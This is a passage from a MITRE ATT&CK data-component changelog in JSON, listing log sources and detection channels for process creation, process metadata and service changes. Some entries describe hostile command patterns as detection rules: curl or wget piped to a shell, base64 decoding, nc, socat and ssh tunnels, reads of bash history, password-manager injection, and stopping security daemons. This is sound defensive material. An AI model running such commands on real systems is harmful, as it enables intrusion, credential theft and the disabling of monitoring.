                            "channel": "execve: Commands that alter firewall or start listeners: iptables|nft|ufw|firewall-cmd|pfctl|systemctl start sshd/telnet/dropbear; raw-socket/libpcap tools (tcpdump, tshark, nmap --raw)."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Execution of pfctl, socketfilterfw, launchctl start ssh/telnet, libpcap consumers."
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "Shell Execution"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unusual child process tree indicating attempted recovery after crash"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of binaries/scripts presenting false health messages for security daemons"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of processes mimicking Apple Security & Privacy GUIs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, setifflags"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events where path like '%tcpdump%'"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of dd, shred, or wipe with arguments targeting block devices"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "systemctl stop auditd, kill -9 <pid>, or modifications to /etc/selinux/config"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of curl, git, or Office processes with network connections"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream - process subsystem"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls for qemu-system*, kvm, or VBoxHeadless"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process execution for VBoxHeadless, prl_vm_app, vmware-vmx"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process logs"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of interpreters (python, perl), custom binaries, or shell utilities with long arguments containing non-standard tokens"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC: arguments contain long, non-standard tokens / custom alphabets"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "command line or log output shows non-standard encoding routines"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "commands containing long non-standard tokens or custom lookup tables"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of /usr/sbin/installer spawning child process from within /private/tmp or package contents"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of dpkg or rpm followed by fork/execve from within postinst, prerm, etc."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execve: Helper tools invoked through XPC executing unexpected binaries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of modified binary without valid signature"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: exe in (/usr/bin/bash,/usr/bin/sh,/usr/bin/zsh,/usr/bin/python*) AND cmdline matches '(curl|wget).*(\\||\\|\\s*sh|bash)|base64\\s*-d|python\\s*-c'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: ParentImage in (Terminal, iTerm2) AND Image in (/bin/zsh,/bin/bash,/usr/bin/python*) AND CommandLine matches '(curl|wget).*(\\||\\|\\s*sh|bash)|base64 -D|python -c'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process created with repeated ICMP or UDP flood behavior"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "binary execution of security_authtrampoline"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: exec"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Exec"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Child processes of Safari, Chrome, or Firefox executing scripting interpreters"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of older or non-standard interpreters"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process execution events for permission modification utilities with command-line analysis"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events for chmod, chown, chflags with parameter analysis and target path examination"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process execution monitoring for permission modification utilities with command-line argument analysis"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Invocation of packet generation tools (e.g., hping3, nping) or fork bombs"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Execution of flooding tools or compiled packet generators"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "process"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve for proxy tools"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process, socket, and DNS logs"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events table"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Command line containing `trap` or `echo 'trap` written to login shell files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log collect --predicate"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve or nanosleep with no stdout/stderr I/O"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchd or osascript spawns process with delay command"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "systemd-udevd spawning user-defined action from RUN+="
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "execve"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:spawn"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate 'eventMessage contains \"exec\"'"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "cat|less|grep accessing .bash_history from a non-shell process"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Process execution via .desktop Exec path from /etc/xdg/autostart or ~/.config/autostart"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of dpkg, rpm, or other package manager with list flag"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of system_profiler or osascript invoking enumeration"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "apache2 or nginx spawning sh, bash, or python interpreter"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "httpd spawning bash, zsh, python, or osascript"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of /usr/libexec/security_authtrampoline or child processes originating from non-trusted binaries triggering credential prompts"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of security or osascript"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchd spawning processes tied to new or modified LaunchDaemon .plist entries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of ping, nping, or crafted network packets via bash or python to reflection services"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of commands modifying iptables/nftables to block selective IPs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "System process modifications altering DNS/proxy settings"
                        },
                        {
                            "name": "containerd:Events",
                            "channel": "unusual process spawned from container image context"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "curl, python scripts, rsync with internal share URLs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: spawn, exec"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Rapid spawning of resource-heavy applications (e.g., Preview, Safari, Office)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process creation events where command line = pmset with arguments affecting sleep, hibernatemode, displaysleep"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected apps performing repeated DNS lookups"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchservices or loginwindow events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve with LD_PRELOAD or linker-related environment variables set"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of process with DYLD_INSERT_LIBRARIES set"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious Swift/Objective-C or scripting processes writing archive-like outputs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of re-parented process"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Anomalous parent PID change"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process creation with parent PID of 1 (launchd)"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "child process invoking dynamic linker post-ptrace"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Processes executing kextload, spctl, or modifying kernel extension directories"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Unsigned or ad-hoc signed process executions in user contexts"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of diskutil or hdiutil attaching hidden partitions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events for discovery utilities (system_profiler, sw_vers, dscl, networksetup) with command-line parameter analysis"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process event monitoring with focus on discovery utilities and cryptographic framework usage correlation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected apps generating frequent DNS queries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process exec"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket: Suspicious creation of AF_UNIX sockets outside expected daemons"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Non-standard processes invoking financial applications or payment APIs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Agent/headless flags (listen/connect/reverse/tunnel) or remote-control binaries spawning shells"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "systemctl enable/start: Creation/enablement of custom .service units in /etc/systemd/system"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process exec of remote-control apps or binaries with headless/connect flags"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: systemctl stop, service stop, or kill -9 on security daemons (e.g., falcon-sensor, auditd)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of launchctl unload, kill, or removal of security agent daemons"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process activity, exec events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream process subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:exec and kext load events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --info --predicate 'eventMessage CONTAINS \"exec\"'"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-DotNETRuntime",
                            "channel": "Unexpected AppDomain creation events or anomalous AppDomainManager assembly load behavior"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of network stress tools or anomalies in socket/syscall behavior"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unsigned binary execution following SIP change"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Commands altering firewall or enabling listeners (iptables, nft, ufw, firewall-cmd, systemctl start *ssh*/*telnet*, ip route add, tcpdump, tshark)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Execution of /sbin/pfctl, /usr/libexec/ApplicationFirewall/socketfilterfw, ifconfig, tcpdump, npcap/libpcap consumers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of zip, ditto, hdiutil, or openssl by non-terminal parent processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of binaries with TCC protected access under unexpected parent processes such as Finder.app, SystemUIServer, or nsurlsessiond"
                        },
                        {
                            "name": "WinEventLog:AppLocker",
                            "channel": "EventCode=8003, 8004"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, unlink"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd, processes"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "socat, ssh, or nc processes opening unexpected ports"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution of ssh with -L/-R forwarding flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchd or cron spawning mining binaries"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve or socket/connect system calls for processes using RSA handshake"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process invoking SecKeyCreateRandomKey or asymmetric crypto APIs"
                        },
                        {
                            "name": "azure:vmguest",
                            "channel": "Unexpected execution of cloud agent processes (e.g., WindowsAzureGuestAgent.exe, ssm-agent) followed by arbitrary script or binary execution"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Script interpreter invoked by nginx/apache worker process"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of Office binaries with network activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launch of bash/zsh/python/osascript targeting key file locations"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of /sbin/emond with child processes launched"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "provider: ETW CreateProcess events linking msbuild.exe to suspicious children where standard logs are incomplete"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "shutdown -h now or reboot"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of Code.app, idea, JetBrainsToolbox, eclipse with install/extension flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events for system discovery utilities (system_profiler, sysctl, networksetup, ioreg) with parameter analysis"
                        },
                        {
                            "name": "OpenBSM:AuditTrail",
                            "channel": "BSM audit events for process execution and system call monitoring during reconnaissance"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "host daemon events related to VM operations and configuration queries during reconnaissance"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMware kernel events for hardware and system configuration access during environmental validation"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "processes modifying environment variables related to history logging"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: parent process is usb/hid device handler, child process bash/python invoked"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of curl, rclone, or Office apps invoking network sessions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Execution of kextstat, kextfind, or ioreg targeting driver information"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process creation involving binaries interacting with resource fork data"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process event"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of suspicious exploit binaries targeting security daemons"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execve: Unsigned or unnotarized processes launched with high privileges"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "security OR injection attempts into 1Password OR LastPass"
                        },
                        {
                            "name": "AndroidLogs:Kernel",
                            "channel": "init or zygote process executing scripts or binaries from non-standard data or sdcard locations during early boot"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "launchd invocation of binary from non-Apple, non-AppStore, or sideloaded location during boot or shortly after unlock"
                        },
                        {
                            "name": "AndroidLogs:Framework",
                            "channel": "Creation of a new process running as system or root UID whose executable path resides under an app container path (for example, /data/app or /data/user/0/<pkg>), or whose parent process originates from an app sandbox"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Creation of a new process with elevated UID or sensitive entitlements whose binary path is associated with an app container or whose parent/caller is a low-privileged app/webcontent process"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "dlopen of a recently created .so OR short-lived child (/system/bin/sh,toybox,linker) spawned by app_process"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "startActivity on top of <target_pkg> (launchMode/singleTop), task switch immediately after focus"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "unexpected spikes in fork/exec/app process start events for helper utilities used for enumeration (ps, toybox/toolbox variants) from same UID"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes audio buffer or recorded audio file into application storage directories"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application installed from adb, sideload, or unknown USB source"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application execution triggered with unexpected parent context or via indirect invocation (intent redirection or component hijack)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_data_source_ref']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-13 15:49:16.424000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0032\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0032\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][320]\": {\"name\": \"AndroidLogs:Kernel\", \"channel\": \"init or zygote process executing scripts or binaries from non-standard data or sdcard locations during early boot\"}, \"root['x_mitre_log_sources'][321]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"launchd invocation of binary from non-Apple, non-AppStore, or sideloaded location during boot or shortly after unlock\"}, \"root['x_mitre_log_sources'][322]\": {\"name\": \"AndroidLogs:Framework\", \"channel\": \"Creation of a new process running as system or root UID whose executable path resides under an app container path (for example, /data/app or /data/user/0/<pkg>), or whose parent process originates from an app sandbox\"}, \"root['x_mitre_log_sources'][323]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Creation of a new process with elevated UID or sensitive entitlements whose binary path is associated with an app container or whose parent/caller is a low-privileged app/webcontent process\"}, \"root['x_mitre_log_sources'][324]\": {\"name\": \"android:logcat\", \"channel\": \"dlopen of a recently created .so OR short-lived child (/system/bin/sh,toybox,linker) spawned by app_process\"}, \"root['x_mitre_log_sources'][325]\": {\"name\": \"android:logcat\", \"channel\": \"startActivity on top of <target_pkg> (launchMode/singleTop), task switch immediately after focus\"}, \"root['x_mitre_log_sources'][326]\": {\"name\": \"android:logcat\", \"channel\": \"unexpected spikes in fork/exec/app process start events for helper utilities used for enumeration (ps, toybox/toolbox variants) from same UID\"}, \"root['x_mitre_log_sources'][327]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes audio buffer or recorded audio file into application storage directories\"}, \"root['x_mitre_log_sources'][328]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior\"}, \"root['x_mitre_log_sources'][329]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application installed from adb, sideload, or unknown USB source\"}, \"root['x_mitre_log_sources'][330]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation\"}, \"root['x_mitre_log_sources'][331]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor\"}, \"root['x_mitre_log_sources'][332]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application execution triggered with unexpected parent context or via indirect invocation (intent redirection or component hijack)\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-16 17:01:33.771000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0034",
                            "external_id": "DC0034"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Process Metadata",
                    "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Process",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.process"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "CodeIntegrity/WDAC events indicating unsigned/invalid DLL loads"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sudo or service accounts invoking loaders with suspicious env vars"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Process Context"
                        },
                        {
                            "name": "esxi:auth",
                            "channel": "user session"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Admin activity"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve call for sudo where euid != uid"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.TCC"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec of binary with setuid/setgid and EUID != UID"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Use of fork/exec with DISPLAY unset or redirected"
                        },
                        {
                            "name": "EDR:Telemetry",
                            "channel": "Process lineage and API usage enrichment (GetSystemTime, GetTimeZoneInformation, NtQuerySystemTime)"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "/var/log/hostd.log API calls reading/altering time/ntp settings"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, prctl, or ptrace activity affecting process memory or command-line arguments"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Cross-reference argv[0] with actual executable path and parent process metadata"
                        },
                        {
                            "name": "WinEventLog:AppLocker",
                            "channel": "AppLocker audit/blocks showing developer utilities executing scripts/binaries outside policy"
                        },
                        {
                            "name": "EDR:hunting",
                            "channel": "Correlation of signer info, parent-child lineage, rare invocation context (user host role), and API surfaces (CreateProcess*, LoadLibrary*)"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Security-Mitigations/KernelMode",
                            "channel": "ETW telemetry indicating ClickOnce deployment (dfsvc.exe) launching payloads"
                        },
                        {
                            "name": "etw:Microsoft-Windows-ClickOnce",
                            "channel": "provider: Event Tracing for Windows (ETW) events associated with ClickOnce deployment (dfsvc.exe activity)"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Camera Frame Server/Operational",
                            "channel": "Process session start/stop events for camera pipeline by unexpected executables"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "select: path LIKE '/dev/video%'"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "state=attached/debugged"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Code Execution & Entitlement Access"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process opening SSH_AUTH_SOCK or /tmp/ssh-* socket not owned by same UID"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "code signature/memory protection"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve with UID \u2260 EUID"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve with escalated privileges"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "cross-account or unexpected assume role"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log collect from launchd and process start"
                        },
                        {
                            "name": "containerd:events",
                            "channel": "Docker or containerd image pulls and process executions"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Kernel or daemon warnings of downgraded TLS or cryptographic settings"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modifications or writes to EFI system partition for downgraded bootloaders"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "non-shell process tree accessing bash history"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process metadata mismatch between /proc and runtime attributes"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process environment variables containing LD_PRELOAD"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "EventCode=400, 403"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Process Execution + Hash"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "process_start: EventHeader.ProcessId true parent vs reported PPID mismatch"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC, ES_EVENT_TYPE_NOTIFY_MMAP"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Unsigned/invalid signature modules or images loaded by msbuild.exe or its children"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-DeviceGuard/Operational",
                            "channel": "WDAC policy audit/block affecting msbuild.exe spawned payloads"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-SmartAppControl/Operational",
                            "channel": "Smart App Control decisions (audit/block) for msbuild.exe-launched executables"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Unsigned or untrusted modules loaded during JamPlus.exe runtime"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Crash or abnormal termination of security agent or system extension host"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 17:01:33.771000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][44]\": {\"name\": \"macos:unifiedlog\", \"channel\": \"Crash or abnormal termination of security agent or system extension host\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-20 18:21:23.994000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0065",
                            "external_id": "DC0065"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Service Modification",
                    "description": "Changes made to an existing service or daemon, such as modifying the service name, start type, execution parameters, or security configurations.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "esxi:hostd",
                            "channel": "service state change"
                        },
                        {
                            "name": "Service",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Microsoft-IIS-Configuration",
                            "channel": "Module or ISAPI filter registration events"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=7040"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 18:21:23.994000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"esxi:hostd\", \"channel\": \"service state change\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.271000+00:00",
                    "modified": "2026-03-13 22:24:06.660000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0013",
                            "external_id": "DC0013"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "User Account Metadata",
                    "description": "Contextual data about an account, which may include a username, user ID, environmental data, etc.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4720, 4738"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4673"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "AssumeRole"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open,openat,read"
                        },
                        {
                            "name": "macos:MDM",
